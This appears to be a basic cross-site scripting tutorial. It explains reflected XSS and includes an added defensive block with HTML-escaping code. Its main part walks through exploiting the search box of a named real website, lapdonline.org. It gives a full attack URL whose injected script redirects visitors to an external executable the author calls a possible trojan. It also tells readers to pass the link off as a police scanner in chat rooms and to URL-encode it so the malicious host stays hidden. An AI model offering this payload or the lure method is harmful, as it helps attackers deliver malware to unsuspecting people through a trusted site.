Basic XSS tutorial
Neither the author nor the website where this tutorial is published is responsible for any actions you take with the information in this tutorial. This tutorial has been written for educational purposes only.
In this tutorial I will show you how XSS works and how you can use it.
What is XSS?
XSS is a vulnerability in a web application that lets hackers execute scripts on the client side.
Dangers of XSS
These days browsers keep some of the dangers of XSS out. For example, if a script wants to write or edit files on the computer, it needs extra permission from the user, or in some browsers it just gets blocked.
How does XSS work?
If a user posts something to a web page (e.g. http://search.live.com/), the search engine shows which keyword the user typed.
If a web application processes the input from the user
without filtering, for example the user input: xss-tutorial
it will look like this in the source:
Your keyword was: xss-tutorial
In this case it seems very normal:
it would look like this in the source:
Your keyword was:
This doesn't look very normal on the screen:
Well, this happens when a web application (like a search engine) doesn't filter the user input:
2. The search engine checks whether your keywords match the records, and then builds a page with the results.
3. The search engine builds the rest of the page (like ads and stuff) and directly (without filtering it first) puts your keyword in the page too.
4. The web server sends the page (source) to you.
5. Your browser reads every line of code from the source and shows it on the screen.
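The steps above, as an added example (not part of the original tutorial): a hypothetical search page that puts the keyword into its HTML without filtering, beside a version that HTML-encodes the keyword first. The function names and sample keywords are constructed for illustration.

```javascript
// Added example: all function names and sample inputs are constructed.

// Replace the five characters that let text break out of HTML text or a
// quoted attribute value. "&" is replaced first so that the entities
// produced by the later replacements are not encoded a second time.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Step 3 as the tutorial describes it: the keyword goes into the page as-is,
// so the browser in step 5 parses whatever markup the keyword contains.
function renderResultsUnfiltered(keyword) {
  return "<p>Your keyword was: " + keyword + "</p>";
}

// Same page, but the keyword is encoded for the HTML context before it is
// inserted, so the browser displays it as text.
function renderResultsEscaped(keyword) {
  return "<p>Your keyword was: " + escapeHtml(keyword) + "</p>";
}

// Review/test helper: true when a keyword containing markup characters
// comes back byte-for-byte in the rendered page.
function reflectsRawMarkup(page, keyword) {
  return /[<>"']/.test(keyword) && page.includes(keyword);
}

// Constructed sample keywords: one plain, two containing markup characters.
const samples = [
  "xss-tutorial",
  "<script>/* constructed sample */</script>",
  'a "quoted" & <b>bold</b> term',
];
for (const keyword of samples) {
  const raw = renderResultsUnfiltered(keyword);
  const safe = renderResultsEscaped(keyword);
  console.log(reflectsRawMarkup(raw, keyword), raw);
  console.log(reflectsRawMarkup(safe, keyword), safe);
}
```

The `reflectsRawMarkup` check is the same test a reviewer can apply to a real page: submit a keyword containing `<`, `>` and quotes, then look for it unencoded in the response source.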
How to find and use XSS?
XSS is dangerous because people are easily misled. There are scripts that, for example, steal user cookies, and hackers can abuse those stolen cookies. I'm not going further into cookie stealing, but I will give you another example of how to abuse XSS vulnerabilities. Like I said, you can mislead people by using those XSS vulnerabilities. You can make someone download something by using an XSS on a trusted website.
You wouldn't expect that something downloaded from http://www.lapdonline.org/ would be some kind of malware (a trojan or something). Well, let's see if we can change that. We're going to search for an XSS vulnerability on that website. Go to http://www.lapdonline.org/ You will see a search function under the banner. Let's see if the search engine filters our keyword. Enter as keyword:
Then click on GO. Yeah, it worked!
Well, how can we abuse this?
Go back to:
http://www.lapdonline.org/ and enter that script in the search engine and click on GO.
Look at that: we have been redirected to our file. This file, named policescanner.exe, could be a trojan. You could go into a chat room or community and say it's a police scanner! You would then just give the link from your browser: http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cscript%3Edocument.location=%22http://www.technoplex.co.cc/policescanner.exe%22;%3C/script%3E
People mostly read the first part of a link before clicking on it; in this case: http://www.lapdonline.org/
Well, they are going to think it's an LAPD website, and you're talking about a police scanner, so why not download it? Maybe someone looks closely and sees the link to your trojan,
http://tuts.djoedjoe.com/basicxss/eng/policescanner.exe and they will notice it's fake. But no worries, with a URL encoder you can 'mask' that.
That's it for now. If you need anything more regarding XSS, feel free to reply here.